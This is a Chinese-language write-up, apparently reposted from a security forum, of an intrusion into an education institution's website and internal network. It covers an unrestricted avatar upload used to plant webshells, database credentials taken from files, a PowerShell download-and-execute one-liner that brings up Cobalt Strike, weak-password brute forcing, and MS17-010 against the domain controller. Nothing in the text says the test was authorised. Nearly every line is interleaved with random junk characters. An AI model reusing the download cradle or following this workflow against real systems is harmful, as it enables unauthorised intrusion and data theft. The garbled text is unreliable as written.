) J2 T) t0 E U3 _ 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
. \: U% l! W0 o% z7 n1 m$ r6 {
; a5 Y8 E( r& b/ E3 J& b
/ F1 w8 `# g' k8 `. | + m& K9 D6 G$ O1 ~2 |; E% s
$ D& j5 [5 c# o8 h
" w' i% p5 N" d1 Y0 K 正文
. I4 }/ j6 J! Z- H9 X7 Q% U 3 }# W1 Q: u, E
8 _; e2 w) m2 I. U$ [ 1 K; d4 }* E5 V& d# ?% ^
; S& `# Z1 D0 J* t3 g$ B" B3 P+ k* t* m7 W
目标:www.xxxx.com(一家教育机构) 0 v+ P" i3 N) T& ~% H
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
' z2 X" Y. M+ Q, v& D
( ?% O9 |, a' }9 U$ `9 h+ P* ]% z! y1 m8 h
6 X, w6 F& @; M. F$ x% E) w7 o
% g: P* [5 X7 `9 V
3 H2 h9 w) ^& k& h' N 进行了简单的信息搜集
% \+ c9 Q0 \* Y
8 \" |6 o# @- y
+ X- u* r# Q0 M, o/ x0 I 4 z6 K/ S3 {2 a* _. e+ Z
8 O2 _' `& o! M 子域名搜集
+ N2 S6 F/ l7 M1 f ( F* ?; A+ ^+ Q2 H9 P$ D6 Z- {2 ^
r5 p, ~1 I! k0 e$ x# P
: g0 X/ w9 H/ F; P
, |" U" s0 V% R* W
" B: S2 o7 w+ e# L fofa找资产 - C+ l1 L# g( Q" S7 Q" L7 X G
& T$ {9 L/ [1 F1 g
, v# C$ E+ {# Y ^1 M 8 v7 ~$ V; E3 c; _) s9 J. Z e0 X
+ F1 x- {( D1 u% e! A1 p$ i) o * ~7 J& A% W/ \
8 |9 n1 v3 N! H4 o! Y6 M+ T
8 D, ]) n4 I' N
一共七个资产。去重之后只有两个。
$ O3 ~1 |' `) S+ y! ~+ R( j7 z + m3 s9 U+ A0 K& C1 Q9 R, n3 Q
4 N7 h" W3 n" \+ l
# l4 I% V* V9 n' l k }. ~; m
$ r" F) R& n* N0 b7 n8 B, q 目录探测% ~! F# [1 q3 i' v o$ k* M
( x( \" H. D: G, F3 T! j2 m7 a+ H; l x; V/ g9 l! q& d, F7 W
4 Q2 [! ~. H3 [# m1 F
: t. g: W4 J' r' Z M
. ^! v4 J7 x" ^5 W9 d; D- C
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有 7 P, G$ H' x* [
' K" |/ y3 U1 N+ a6 `; X
" i& h8 m2 M( b$ k j* v+ v
1 |8 T D5 P& {$ M' @: ?: A
$ r4 F H2 n" Y% u% j* G 我又尝试了通过修改返回包来绕过登录界面
! i2 u$ V1 H% H, H$ V8 q0 G! }' y
% D# K- C) |- d* z2 L! E7 f5 `$ ?& v4 w4 n; M
0 U4 [. t- g4 S/ b7 K% H
1 h# q" F L5 W% y1 F& J% `
6 k& O2 j7 y; Z 还是不行,尝试注入无果
( t% G8 D9 T# T2 y' H
7 D4 l" r& T4 U( I1 z# c: W4 V) k5 _: ]8 b! ?% W+ ?
/ S2 n4 O; T& L% j
4 ]7 k. C/ I1 k7 D5 C
: q" o% |5 a* W( s% |9 j 不过我目录探测出了一处Spring信息泄露
' X8 D% e% f4 x3 x& c
# p Z- d( v% w0 f
# N5 c0 w8 R3 P1 P3 X: L - Q) F3 A2 M+ ~( y
- S* X0 Q _3 G ' a( L4 z! ~" C* [+ G' T
' k( j" w# F! }8 `
7 _! O1 r. J, i, I: x7 E 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
' B0 y. ?6 Q d3 c# i9 H 7 C( H) B$ c a$ o
# Y8 d# W! ^7 Z
: y* J# K6 R. C" s4 V) R* W
/ A5 M/ m1 Z' i! D1 U/ d0 ~$ @8 u9 a% c
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。+ h7 |# _+ p' E w
# `# w0 F, _8 q; K( @' j9 r/ U5 `. a
) t, V S, e) T: ]
" e2 R% @" T v& e( _; r
# e" p9 ?8 f$ j/ u 获取有些师傅到这一步就手机抓包电脑测了。* E% K1 e( v# t
" \3 B; P- ^: }, c& M$ g0 q8 l
# k" |- H% H l2 y. S Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。/ y1 E! Q4 u* ]
% k( d* N" T/ B4 L
2 v$ y- ?. d s6 W6 \3 L 其中在一个公众号发现了小程序,可以进行注册。
) y. M! G0 ^( \( I; d2 {( d) v
@5 S! d( T! C. E4 j) N0 E6 m3 L, S& V) n6 f
看到了头像上传,尝试上传获取WebShell" O. v& {- N( T" @2 c4 e
6 l6 p& O0 S& I/ z5 C' O2 U+ u+ w) b
6 P! \+ {; F5 O6 o
5 m2 D3 B5 [3 \- k
$ e) \: ^2 j# M X# C* M9 O) l/ X/ ?! g9 H
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问" W6 V/ C4 _9 q
~2 s" c/ Q) l+ i* {6 S9 l: [0 @+ p: ?9 E. ~
) v7 |. G! G; H- Z
" E5 ?5 _2 s8 d3 z p/ E
# ]% e- T) @: M* o1 E1 g
然后上了大马
+ D! A2 ]/ {* m: Y* O- _9 p' D: g
: O$ P% l/ K# P k' S/ ~
0 m+ ~ z/ k v1 T8 O1 E
4 I4 |: \1 k* k0 y8 q ; o" L% j. D$ \1 m M
3 @ Q* z& ~; c. V) u% L
2 a% R: e# h* N: ?. E . }( R" [& D) Y5 d/ n. u- H4 o
: b' {( V+ m% B7 t6 \" z: c2 v3 E4 m 通过翻找文件发现数据库账号密码
/ E" M' T K% v" b; a' M3 F9 C 6 a' H9 e8 b0 z: t4 i4 n
2 B7 W- E- ]- D
- _% h/ s# _! U! P
5 V' N! { i7 w8 u _
3 Y3 v; J' W% G; J% }5 h --内网渗透, d; ]& e, _$ o0 a; j/ ^
9 L W ?' _; g# g9 a2 B# H; V9 a+ ?. c) E( A6 M
直接通过powershell执行 cs上线
) z- R1 J/ Z! x# ^2 Z5 X a% B * D! m/ T1 n6 A
1 l' y4 l: D+ p; b- K1 P
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))" B; @& d- Q% y" n; B$ S
( B3 q5 G% q+ y5 K" D5 f
% ~ N3 g8 |# G, d7 t " E* n L3 W% U2 S8 m, d t
4 S: [* H! T1 Z8 @6 t$ G4 k
, n7 o- j, Y# E& O# a 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
z# O) v) K$ b# l/ d) l0 @, n6 R j6 N- a- A6 e# C. s5 \- h+ Q. e
- [1 f+ U0 e& ]
! i/ w8 ]1 q! j6 l+ a
8 ]6 f1 M3 Y0 h- a
2 o+ H6 l0 p: l 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。 5 L; U. q! [0 H7 m# L$ E
2 n: f1 q* @ y( Q5 |
4 L3 B9 p# e8 R; H. F! H2 G
8 N Y# C9 ` B
- \* S) F4 a$ H7 f4 p% W/ T, X
E, r, z) j [5 D
! b- E1 F, ?" G2 J* l7 E6 P W
$ Y2 y1 m; _' ?3 ^4 p! f
2 _. \& z* H0 w 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
! Z; S5 ^& M- ^- ?0 A, k1 |, C' ~ 0 G: D# N5 s7 r. T8 T2 F
$ v0 p. I/ |1 T5 O4 `& N0 B4 V
8 `6 {# k+ K* `- ]
8 t1 v1 F, ^. J" i" L" ]6 d+ |/ N( ]
5 V1 H+ p& [: U/ a$ L8 g e- k* Z5 h ; s6 a# Y. q* `4 K: [: ^* W7 g
1 j" q4 N+ E/ V' }+ S5 \" [$ @% L+ ~0 I
# u* H5 Q3 q( t- Q ; u8 I |4 h9 [
- ?% c" k# ~, B5 V
9 {+ K0 z4 w; I0 k$ k" I" X: i- T
) T( |: X& t( R- m" ]) w, P" Z+ x2 C 1 Z3 n! l" Y2 E( S0 O0 N
7 F# ]# p* c- G. U6 ^& D# g G* t( h0 W$ W! j
小结
9 n2 U0 `; s7 K
6 f( e: G- ~( x- e3 X' V+ b9 d( o9 Z d/ h
; r* V7 ]2 t8 ~5 T- G
( p# H& E/ Z0 ?( v1 F7 v2 a
1 a' |# |; l. b$ H0 M$ v; | U
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!" H: `3 b0 d0 u
2 X4 T5 u, h' V9 l
; _3 X7 Y7 Y9 U4 V3 b1 w' r1 m # |. D g9 b& D+ r- j0 j
- F" p! R5 H8 {3 j( g. y/ g% E$ d2 ~1 m6 u1 C
- 2 g. {) r2 c. |! ~- ?/ n: E
! M4 i5 r0 J" r, L. l
0 A' ~* Q4 d$ v) k" C" Z3 z" G -
$ B& r. r* L+ w+ U$ A 9 |) I' R& {1 Y0 k/ b s
4 Z8 V, y" v0 l 7 g% g* X/ [7 l$ P/ a
/ I( T+ {" x, P) [* p+ \8 H4 k 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
* [; m; F$ k% K' _! [$ d
( l% A3 @1 M6 W; `" b% \+ P' Z
" v& T6 E% l2 X' j) n
5 Z( v* f) R, {/ h |